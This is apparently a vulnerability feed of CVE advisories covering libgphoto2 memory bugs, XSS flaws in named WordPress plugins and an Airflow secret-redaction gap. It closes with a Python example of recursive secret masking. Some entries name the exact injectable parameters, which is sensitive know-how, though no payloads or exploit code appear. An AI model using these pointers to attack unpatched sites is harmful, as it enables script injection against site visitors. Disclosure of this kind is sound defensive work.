Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a connected camera to read sensitive information from process memory or cause denial of service via malformed EOS event data. Two functions in ptp-pack.c lack length validation, enabling unbounded buffer reads when processing camera events. The vulnerability requires physical device access and is not remotely exploitable, with no public exploit code identified at time of analysis.
Buffer Overflow
Information Disclosure
Red Hat
Suse
-
CVE-2026-6048
MEDIUM
CVSS 6.4
Stored XSS in Flipbox Addon for Elementor WordPress plugin (versions ≤2.1.1) allows authenticated authors to inject malicious scripts via the button URL custom_attributes field due to insufficient validation of attribute names. The plugin applies esc_html() to attribute names, which only encodes HTML special characters and therefore does nothing to block event-handler names such as onmouseover and onclick, enabling arbitrary JavaScript execution in pages viewed by any user. CVSS 6.4 reflects the requirement for authenticated author-level access, but the stored nature and cross-site scope increase practical risk. Patch available in version 2.1.2.
WordPress
XSS
-
CVE-2026-4801
MEDIUM
CVSS 6.4
Stored Cross-Site Scripting in CoBlocks Page Builder plugin for WordPress allows authenticated Contributor-level users to inject malicious scripts via external iCal feed data in the Events block, executing arbitrary JavaScript in pages visited by any user. The vulnerability exists in all versions through 3.1.16 due to insufficient output escaping of event titles, descriptions, and locations. CVSS 6.4 reflects limited direct impact (confidentiality and integrity) but broad scope across WordPress installations, and no public exploit code or active exploitation has been confirmed at this time.
WordPress
XSS
-
CVE-2026-2986
MEDIUM
CVSS 6.4
Stored Cross-Site Scripting in Contextual Related Posts plugin for WordPress (versions up to 4.2.1) allows authenticated contributors and above to inject malicious scripts via the 'other_attributes' parameter, which execute in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping, enabling escalation from contributor-level access to script execution in the browser of any visitor, including administrators. No active exploitation in the wild has been confirmed, but the attack requires only authenticated access at a low privilege level that is commonly granted in WordPress environments.
WordPress
XSS
-
CVE-2026-2505
MEDIUM
CVSS 5.4
Stored Cross-Site Scripting in Categories Images WordPress plugin versions up to 3.3.1 allows authenticated contributors and above to inject malicious scripts via the 'class' attribute of the 'z_taxonomy_image' shortcode, which executes in the context of other users viewing the affected page. The vulnerability stems from insufficient HTML escaping in the shortcode's fallback image builder. No public exploit code or active exploitation has been identified, but the attack requires only authenticated contributor-level access and user interaction with the injected content.
WordPress
XSS
-
CVE-2026-1838
MEDIUM
CVSS 6.1
Reflected XSS in Hostel WordPress plugin versions up to 1.1.6 allows unauthenticated attackers to inject arbitrary JavaScript via the 'shortcode_id' parameter, requiring user interaction (clicking a malicious link) to execute. The vulnerability stems from insufficient input sanitization and output escaping in the shortcode handling code. No public exploit code or active exploitation has been identified at time of analysis.
WordPress
XSS
-
CVE-2026-1559
MEDIUM
CVSS 6.4
Youzify plugin for WordPress (versions up to 1.3.6) allows authenticated subscribers to execute stored cross-site scripting attacks via the 'checkin_place_id' parameter due to insufficient input sanitization and output escaping. An attacker with subscriber-level access can inject arbitrary JavaScript that executes when other users view the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at the time of this analysis.
WordPress
XSS
-
CVE-2026-0894
MEDIUM
CVSS 6.4
Stored Cross-Site Scripting in Content Blocks (Custom Post Widget) plugin for WordPress affects all versions up to 3.3.9, allowing authenticated contributors and above to inject arbitrary JavaScript via the content_block shortcode that executes in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping; no public exploit code or active exploitation has been identified at the time of analysis, but the low attack complexity and broad scope (cross-site) make this a significant risk for WordPress sites with untrusted contributor accounts.
WordPress
XSS
-
CVE-2026-40341
LOW
CVSS 3.5
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical USB access to crash the library via malformed PTP protocol data from untrusted camera devices, affecting applications using libgphoto2 for camera enumeration and control on desktop systems.
Buffer Overflow
-
CVE-2026-40336
LOW
CVSS 2.4
libgphoto2 versions up to 2.5.33 leak memory in the Sony camera property descriptor parser when processing secondary enumeration lists from 2024+ Sony cameras, causing denial of service through resource exhaustion on systems with repeated camera enumeration or property descriptor parsing. The vulnerability requires physical access to a Sony camera or crafted USB device communication, affecting users who interact with affected Sony camera models via libgphoto2. Vendor-released patch: version 2.5.34 and later.
Information Disclosure
-
CVE-2026-40334
LOW
CVSS 3.5
Missing null terminator in libgphoto2's ptp_unpack_Canon_FE() function allows out-of-bounds memory reads when processing Canon camera filenames. Versions up to 2.5.33 are vulnerable when a 13-byte filename without null termination is supplied, causing subsequent string operations to read beyond buffer boundaries. The vulnerability requires physical camera access and results in information disclosure or denial of service, not remote code execution.
Buffer Overflow
-
CVE-2026-32690
LOW
CVSS 3.7
Apache Airflow 3.0.0 through 3.1.x fails to redact secrets stored as nested fields within JSON-formatted variables, allowing authenticated users with variable access to retrieve plaintext sensitive values. This information disclosure vulnerability affects deployments that store credentials or API keys as JSON dictionary structures in Airflow variables. The EPSS score of 0.02% and CVSS 3.7 with high attack complexity reflect limited real-world exploitation likelihood, but the vulnerability poses direct risk to organizations using JSON-structured secrets without additional access controls.
Apache
Information Disclosure
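The difference between checking only the outermost keys and walking the whole structure, as an added example (not Airflow's secrets masker or its fix): `mask_top_level_only` reconstructs the bug class described above for contrast, `mask_nested` masks every scalar under a sensitive key at any depth, and `mask_variable` applies that to a variable stored as a JSON string. The key pattern and the sample variable are constructed for this example.

```python
import json
import re

# Key names treated as sensitive (constructed list; extend to match your naming conventions).
SENSITIVE_KEY = re.compile(r"(password|passwd|secret|token|api[_-]?key|private[_-]?key|access[_-]?key)", re.I)
MASK = "***"


def mask_nested(value, key=None, inherited=False):
    """Walk dicts and lists; every scalar under a sensitive key at any depth becomes MASK.
    A sensitive key masks its whole subtree, so {"secret": {"a": 1}} is fully masked."""
    sensitive = inherited or (key is not None and SENSITIVE_KEY.search(str(key)) is not None)
    if isinstance(value, dict):
        return {k: mask_nested(v, k, sensitive) for k, v in value.items()}
    if isinstance(value, list):
        return [mask_nested(v, key, sensitive) for v in value]
    return MASK if sensitive else value


def mask_top_level_only(value):
    """The bug class described for 3.0.x-3.1.x, reconstructed for contrast (not Airflow's code):
    only keys of the outermost object are inspected, so nested credentials pass through."""
    if not isinstance(value, dict):
        return value
    return {k: (MASK if SENSITIVE_KEY.search(str(k)) else v) for k, v in value.items()}


def mask_variable(raw):
    """Variables are stored as strings: mask JSON-structured values recursively and leave
    non-JSON strings to name-based masking of the variable itself."""
    try:
        parsed = json.loads(raw)
    except (TypeError, ValueError):
        return raw
    if not isinstance(parsed, (dict, list)):
        return raw
    return json.dumps(mask_nested(parsed))


if __name__ == "__main__":
    # Constructed sample variable mixing connection settings and credentials at several depths.
    sample = {"host": "db.internal", "port": 5432,
              "credentials": {"user": "airflow", "password": "hunter2"},
              "services": [{"name": "s1", "api_key": "k1"}, {"name": "s2", "apiKey": "k2"}]}
    print("top-level only:", mask_top_level_only(sample))
    print("nested:        ", mask_nested(sample))
    print("stored string: ", mask_variable(json.dumps(sample)))
```

Masking on key names is a floor, not a ceiling: a secret stored under a key like `db_url` is not caught by any pattern, which is why value-based masking of known secret strings in logs remains necessary alongside this.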